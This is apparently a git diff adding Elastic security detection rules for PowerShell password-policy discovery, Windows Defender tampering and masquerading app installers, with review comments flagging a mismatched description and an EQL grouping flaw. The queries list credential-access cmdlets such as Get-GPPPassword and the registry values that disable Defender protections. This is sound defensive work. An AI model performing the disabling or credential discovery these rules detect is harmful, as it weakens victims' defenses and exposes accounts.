registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: PowerShell Logs" + ], + "threat": [ + { + "framework": 
"MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/" + }, + { + "id": "T1558", + "name": "Steal or Forge Kerberos Tickets", + "reference": "https://attack.mitre.org/techniques/T1558/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "fddff193-48a3-484d-8d35-90bb3d323a56_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_4.json b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_4.json new file mode 100644 index 00000000000..cfd26df41d7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_4.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Password Policy Discovery Capabilities", + "query": "event.category: \"process\" and host.os.type:windows and\n(\n powershell.file.script_block_text: (\n \"Get-ADDefaultDomainPasswordPolicy\" or\n \"Get-ADFineGrainedPasswordPolicy\" or\n \"Get-ADUserResultantPasswordPolicy\" or\n \"Get-DomainPolicy\" or\n \"Get-GPPPassword\" or\n \"Get-PassPol\"\n )\n or\n powershell.file.script_block_text: (\n (\"defaultNamingContext\" or \"ActiveDirectory.DirectoryContext\" or \"ActiveDirectory.DirectorySearcher\") and\n (\n (\n \".MinLengthPassword\" or\n \".MinPasswordAge\" or\n \".MaxPasswordAge\"\n ) or\n (\n \"minPwdAge\" or\n \"maxPwdAge\" or\n \"minPwdLength\"\n ) or\n (\n \"msDS-PasswordSettings\"\n )\n )\n )\n) and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n and not \n (\n powershell.file.script_block_text : (\"43c15630-959c-49e4-a977-758c5cc93408\" and \"CmdletsToExport\" and \"ActiveDirectory.Types.ps1xml\")\n )\n and not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": 
"fe25d5bc-01fa-494a-95ff-535c29cc4c96", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1201", + "name": "Password Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1201/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 4 + }, + "id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96_4", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_5.json b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_5.json new file mode 100644 index 00000000000..40298b4a0ae --- /dev/null 
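Review bot: The `description` of this rule does not match its `name` or `query`: it talks about WinRM remote-execution cmdlets and lateral movement, while the name is "PowerShell Script with Password Policy Discovery Capabilities" and the query matches `Get-ADDefaultDomainPasswordPolicy`, `Get-DomainPolicy` and the `minPwdAge`/`maxPwdAge`/`minPwdLength` attributes, so the text appears to have been copied from another rule. Suggested replacement: `"description": "Identifies PowerShell scripts that enumerate domain password policy settings through Active Directory cmdlets or LDAP attributes. Adversaries may collect this information to inform credential-based attacks."`. The `_5` revision of the same rule in the following hunk narrows the index pattern but carries the identical mismatched description and needs the same correction.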
+++ b/packages/security_detection_engine/kibana/security_rule/fe25d5bc-01fa-494a-95ff-535c29cc4c96_5.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the use of Cmdlets and methods related to remote execution activities using WinRM. Attackers can abuse WinRM to perform lateral movement using built-in tools.", + "from": "now-119m", + "index": [ + "winlogbeat-*", + "logs-windows.powershell*" + ], + "interval": "60m", + "language": "kuery", + "license": "Elastic License v2", + "name": "PowerShell Script with Password Policy Discovery Capabilities", + "query": "event.category: \"process\" and host.os.type:windows and\n(\n powershell.file.script_block_text: (\n \"Get-ADDefaultDomainPasswordPolicy\" or\n \"Get-ADFineGrainedPasswordPolicy\" or\n \"Get-ADUserResultantPasswordPolicy\" or\n \"Get-DomainPolicy\" or\n \"Get-GPPPassword\" or\n \"Get-PassPol\"\n )\n or\n powershell.file.script_block_text: (\n (\"defaultNamingContext\" or \"ActiveDirectory.DirectoryContext\" or \"ActiveDirectory.DirectorySearcher\") and\n (\n (\n \".MinLengthPassword\" or\n \".MinPasswordAge\" or\n \".MaxPasswordAge\"\n ) or\n (\n \"minPwdAge\" or\n \"maxPwdAge\" or\n \"minPwdLength\"\n ) or\n (\n \"msDS-PasswordSettings\"\n )\n )\n )\n) and not powershell.file.script_block_text : (\n \"sentinelbreakpoints\" and \"Set-PSBreakpoint\" and \"PowerSploitIndicators\"\n )\n and not \n (\n powershell.file.script_block_text : (\"43c15630-959c-49e4-a977-758c5cc93408\" and \"CmdletsToExport\" and \"ActiveDirectory.Types.ps1xml\")\n )\n and not user.id : \"S-1-5-18\"\n", + "related_integrations": [ + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": 
"fe25d5bc-01fa-494a-95ff-535c29cc4c96", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Tactic: Execution", + "Data Source: PowerShell Logs", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1201", + "name": "Password Policy Discovery", + "reference": "https://attack.mitre.org/techniques/T1201/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 5 + }, + "id": "fe25d5bc-01fa-494a-95ff-535c29cc4c96_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_109.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_109.json new file mode 100644 index 00000000000..a0324d9e1a2 
--- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_109.json 
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior.", + "false_positives": [ + "Legitimate Windows Defender configuration changes" + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Windows Defender Tampering", + "note": "## Triage and analysis\n\n### Investigating Microsoft Windows Defender Tampering\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for modifications that disable Windows Defender features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine which features have been disabled, and check if this operation is done under change management and approved according to the organization's policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableRealtimeMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIntrusionPreventionSystem\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableScriptScanning\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows 
Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\EnableControlledFolderAccess\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIOAVProtection\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Reporting\\\\DisableEnhancedNotifications\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SpynetReporting\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SubmitSamplesConsent\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableBehaviorMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\"))\n", + "references": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + "https://www.tenforums.com/tutorials/104025-turn-off-core-isolation-memory-integrity-windows-10-a.html", + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", + "https://www.tenforums.com/tutorials/51514-turn-off-microsoft-defender-periodic-scanning-windows-10-a.html", + 
"https://www.tenforums.com/tutorials/3569-turn-off-real-time-protection-microsoft-defender-antivirus.html", + "https://www.tenforums.com/tutorials/99576-how-schedule-scan-microsoft-defender-antivirus-windows-10-a.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 
109 + }, + "id": "fe794edd-487f-4a90-b285-3ee54f2af2d3_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_110.json b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_110.json new file mode 100644 index 00000000000..cb4f99b289d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/fe794edd-487f-4a90-b285-3ee54f2af2d3_110.json 
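Review bot: The `query` applies the `host.os.type == "windows"` and `event.type in ("creation", "change")` conditions only to the first registry clause, because EQL evaluates `and` with higher precedence than `or`; every subsequent `(registry.path : ... and registry.data.strings : ...) or` branch is matched without those filters, so the rule fires on any registry event type for those paths rather than only creations and changes. The intended shape is to open a parenthesis after the last `and` on the first line and close it before the query's final newline: `... and event.type in (\"creation\", \"change\") and (\n (registry.path : ...) or\n ... \n)`. The `_110` revision in the next hunk contains the same query and needs the same grouping.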
@@ -0,0 +1,104 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies when one or more features on Microsoft Defender are disabled. Adversaries may disable or tamper with Microsoft Defender features to evade detection and conceal malicious behavior.", + "false_positives": [ + "Legitimate Windows Defender configuration changes" + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Microsoft Windows Defender Tampering", + "note": "## Triage and analysis\n\n### Investigating Microsoft Windows Defender Tampering\n\nMicrosoft Windows Defender is an antivirus product built into Microsoft Windows, which makes it popular across multiple environments. Disabling it is a common step in threat actor playbooks.\n\nThis rule monitors the registry for modifications that disable Windows Defender features.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Examine which features have been disabled, and check if this operation is done under change management and approved according to the organization's policy.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. 
Analysts can dismiss the alert if the administrator is aware of the activity, the configuration is justified (for example, it is being used to deploy other security solutions or troubleshooting), and no other suspicious activity has been observed.\n\n### Related rules\n\n- Windows Defender Disabled via Registry Modification - 2ffa1f1e-b6db-47fa-994b-1512743847eb\n- Disabling Windows Defender Security Settings via PowerShell - c8cccb06-faf2-4cd5-886e-2c9636cfcb87\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Take actions to restore the appropriate Windows Defender antivirus configurations.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type in (\"creation\", \"change\") and\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\DisableAntiSpyware\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Features\\\\TamperProtection\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableRealtimeMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIntrusionPreventionSystem\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableScriptScanning\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows 
Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\EnableControlledFolderAccess\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableIOAVProtection\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Reporting\\\\DisableEnhancedNotifications\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen\" and\n registry.data.strings : (\"1\", \"0x00000001\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SpynetReporting\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\SpyNet\\\\SubmitSamplesConsent\" and\n registry.data.strings : (\"0\", \"0x00000000\")) or\n (registry.path : \"HKLM\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection\\\\DisableBehaviorMonitoring\" and\n registry.data.strings : (\"1\", \"0x00000001\"))\n", + "references": [ + "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/", + "https://www.tenforums.com/tutorials/32236-enable-disable-microsoft-defender-pua-protection-windows-10-a.html", + "https://www.tenforums.com/tutorials/104025-turn-off-core-isolation-memory-integrity-windows-10-a.html", + "https://www.tenforums.com/tutorials/105533-enable-disable-windows-defender-exploit-protection-settings.html", + "https://www.tenforums.com/tutorials/123792-turn-off-tamper-protection-microsoft-defender-antivirus.html", + "https://www.tenforums.com/tutorials/51514-turn-off-microsoft-defender-periodic-scanning-windows-10-a.html", + 
"https://www.tenforums.com/tutorials/3569-turn-off-real-time-protection-microsoft-defender-antivirus.html", + "https://www.tenforums.com/tutorials/99576-how-schedule-scan-microsoft-defender-antivirus-windows-10-a.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "fe794edd-487f-4a90-b285-3ee54f2af2d3", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/" + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 
110 + }, + "id": "fe794edd-487f-4a90-b285-3ee54f2af2d3_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_3.json b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_3.json new file mode 100644 index 00000000000..aae8c6e8af9 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/feafdc51-c575-4ed2-89dd-8e20badc2d6c_3.json 
@@ -0,0 +1,145 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies executables with names resembling legitimate business applications but lacking signatures from the original developer. Attackers may trick users into downloading malicious executables that masquerade as legitimate applications via malicious ads, forum posts, and tutorials, effectively gaining initial access.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Masquerading as Business App Installer", + "query": "process where host.os.type == \"windows\" and\n event.type == \"start\" and process.executable : \"?:\\\\Users\\\\*\\\\Downloads\\\\*\" and\n not process.code_signature.status : (\"errorCode_endpoint*\", \"errorUntrustedRoot\", \"errorChaining\") and\n (\n /* Slack */\n (process.name : \"*slack*.exe\" and not\n (process.code_signature.subject_name in (\n \"Slack Technologies, Inc.\",\n \"Slack Technologies, LLC\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* WebEx */\n (process.name : \"*webex*.exe\" and not\n (process.code_signature.subject_name in (\"Cisco WebEx LLC\", \"Cisco Systems, Inc.\") and process.code_signature.trusted == true)\n ) or\n\n /* Teams */\n (process.name : \"teams*.exe\" and not\n (process.code_signature.subject_name == \"Microsoft Corporation\" and process.code_signature.trusted == true)\n ) or\n\n /* Discord */\n (process.name : \"*discord*.exe\" and not\n (process.code_signature.subject_name == \"Discord Inc.\" and process.code_signature.trusted == true)\n ) or\n\n /* WhatsApp */\n (process.name : \"*whatsapp*.exe\" and not\n (process.code_signature.subject_name in (\n \"WhatsApp LLC\",\n \"WhatsApp, Inc\",\n \"24803D75-212C-471A-BC57-9EF86AB91435\"\n ) and process.code_signature.trusted == true)\n ) or\n\n /* Zoom */\n (process.name : (\"*zoom*installer*.exe\", \"*zoom*setup*.exe\", \"zoom.exe\") and not\n 
